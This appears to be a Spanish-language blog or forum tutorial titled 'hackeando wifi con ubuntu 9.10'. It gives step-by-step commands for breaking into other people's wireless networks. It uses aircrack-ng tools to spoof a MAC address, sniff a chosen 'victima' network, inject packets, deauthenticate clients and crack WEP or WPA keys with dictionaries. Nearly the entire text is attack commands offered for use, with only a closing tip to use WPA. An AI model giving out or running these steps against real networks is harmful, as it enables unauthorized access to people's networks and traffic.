hackeando wifi con ubuntu 9.10 Karmic Koala

Lo primero es instalar la Suite aircrack-ng

sudo apt-get install aircrack-ng

Luego instalamos Macchanger

sudo apt-get install macchanger

Una vez instalado nos aseguramos de no estar conectados en ninguna red inalambrica, dando click derecho en el icono de la red y desactivando la red inalambrica, y abrimos una terminal

1. Activamos modo monitor en nuestra tarjeta de red (NO EN TODAS SE PUEDE, SI NO SE PUEDE ACTIVAR, NO PODRÁS CRACKEAR)

sudo airmon-ng start wlan0


2. Damos de Baja mon0 con:

sudo ifconfig mon0 down


3. Cambiamos la direccion mac de mon0 por 00:11:22:33:44:55

sudo macchanger -m 00:11:22:33:44:55 mon0



4. Damos de alta mon0


sudo ifconfig mon0 up



5. Escaneamos las redes disponibles, y encontraremos nuestra victima

sudo airodump-ng mon0


6. Detenemos la escaneada pulsando

control – c



7. Ejecutamos airodump-ng, cambiando los datos de los corchetes por los de nuestra victima


sudo airodump-ng -c [# canal] -w [nombre red] --bssid [direccion MAC] mon0

Nota: los corchetes no van una vez cambiando los datos.


HASTA ACA TODO ES EN UNA SOLA TERMINAL PROSEGUINMOS.


8. Abrimos otra terminal SIN CERRAR LA ANTERIOR hasta el momento tendriamos 2 terminales abiertas.

Para redes con clave WEP

sudo aireplay-ng -1 6000 -a [direccion MAC] -h 00:11:22:33:44:55 mon0


Para redes con clave WAP
sudo aireplay-ng -0 1 -a [direccion MAC] -c [STATION] mon0



9. Abrimos otra terminal SIN CERRAR LA ANTERIOR hasta el momento tendriamos 3 terminales abiertas.

Para redes con clave WEP

sudo aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b [direccion MAC] -h 00:11:22:33:44:55 mon0

Le decimos que si (y) y le damos enter


Para redes con clave WAP para las claves WAP necesitamos un diccionario WAP gogleando hay muchos para descargar el que funcionen seria cuestion de probarlos.

sudo aircrack-ng -w [/directorio/del/diccionario.lst] [NOMBRE]*.cap


10. Para redes con clave WEP este ultimo paso es para las WEP

Abrimos la 4ta y ultima terminal SIN CERRAR LAS ANTERIORES y ejecutamos en la nueva terminal cambiando los datos de los corchetes por los de nuestra victima.

sudo aircrack-ng -z [nombre red]*.cap

ahora solo basta esperar que descifre la clave.

para las WEP si empieza a buscar y al final dice que no encontro nada, cerramos solo la cuarta terminal y volvemos a escribir el comando y que busque de nuevo. si definitivamente no encuentra nada podrian probar con otra red.


para los que pidan diccionarios les dire que por mas que busque alguno que se pudiera utilizar bien, no lo encontre.


recomendacion si tienes wifi ponle claves WAP


saca provecho a tu conocimiento, dedicacion y esfuerzo.